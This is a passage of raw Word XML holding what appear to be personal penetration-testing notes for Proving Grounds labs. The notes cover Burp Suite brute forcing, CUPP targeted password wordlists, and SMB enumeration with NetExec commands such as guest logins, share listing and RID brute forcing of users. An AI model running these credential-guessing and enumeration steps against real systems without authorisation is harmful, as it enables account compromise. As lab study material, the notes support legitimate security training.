      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001315">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Again used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId364">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Monster</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. It's a really good tool!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001316">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1305"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We bruteforce into website using burpsutie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001317">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001318">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013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1A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g4px4ue38auj" w:id="158"/>
      <w:bookmarkEnd w:id="158"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cupp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000131B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000131C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CUPP is a password profiling tool that generates targeted wordlists by asking for information about a person, organization, or target. Instead of using generic brute-force or massive wordlists like rockyou.txt, CUPP focuses on likely password candidates</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000131D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000131E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It was used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId365">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nagoya</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, which got the password summer2023.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000131F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001320">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001321">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="733"/>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1322">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="733"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install cupp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001323">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001324">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cupp -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001325">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then it will start asking you questions in order to create this list</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001326">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000132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28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001329">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000132A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_96q9tbs19i75" w:id="159"/>
      <w:bookmarkEnd w:id="159"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB (the AD cheatsheet is more updated for SMB)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000132B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB is found on 139 and 445. 139 is for the old version, and 445 is for the new, but usually both are open since 139 is still supplemental stuff that is helpful </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000132C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000132D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000132E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z3m346waqvm2" w:id="160"/>
      <w:bookmarkEnd w:id="160"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate SMB using nxc (Net Exec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000132F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001330">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One thing about nxc is that if you see "Pwn3d!" then that means the user is a local admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001331">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001332">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The good thing about nxc is that it shows permissions for each share (ex. If you can READ)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001333">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001334">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb 10.10.10.10 -u 'guest' -p '' </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001335">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="799"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tries to authenticate SMB using the specified username and password. Here, no password is specified, but you can replace with anything</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001336">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001337">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb 10.10.10.10 -u 'guest' -p '' --shares</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001338">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tries enumerating with "guest" as username and no password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001339">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If we don't include any flags, then it just attempts to sign into SMB using username and password, and it will tell you if it's successful or not</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000133A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000133B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1257300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="386" name="image373.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image373.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId366"/>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133C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Server 2022</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000133D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMBv1 signing is false (SMBv1 false). Only SMBv2+ is supported</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000133E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB signing enabled (singing:True). May prevent certain attacks like relay attacks </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000133F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4881563" cy="1282975"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="108" name="image116.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image116.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId367"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4881563" cy="1282975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001340">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This explains each share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001341">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001342">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001343">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yy1wyz9qobub" w:id="161"/>
      <w:bookmarkEnd w:id="161"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find users in SMB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001344">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001345">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb 10.10.10.10 -u 'guest' -p '' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--rid-brute | grep SidTypeUser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001346">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="696"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This second one just looks for the users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001347">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1279"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate valid user accounts by brute-forcing RIDs (usually starting at 500 or 1000 and going upward)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001348">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1279"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It does this by requesting information about each SID and checking for valid responses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001349">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1279"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RID stands for Relative Identifier, and it is part of the Security Identifier (SID) used in Windows to uniquely identify users and groups. Every domain or local user/group has a SID like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000134A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1279"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">S-1-5-21-&lt;domain-id&gt;-&lt;rid&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000134B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1279"/>
        </w:numPr>
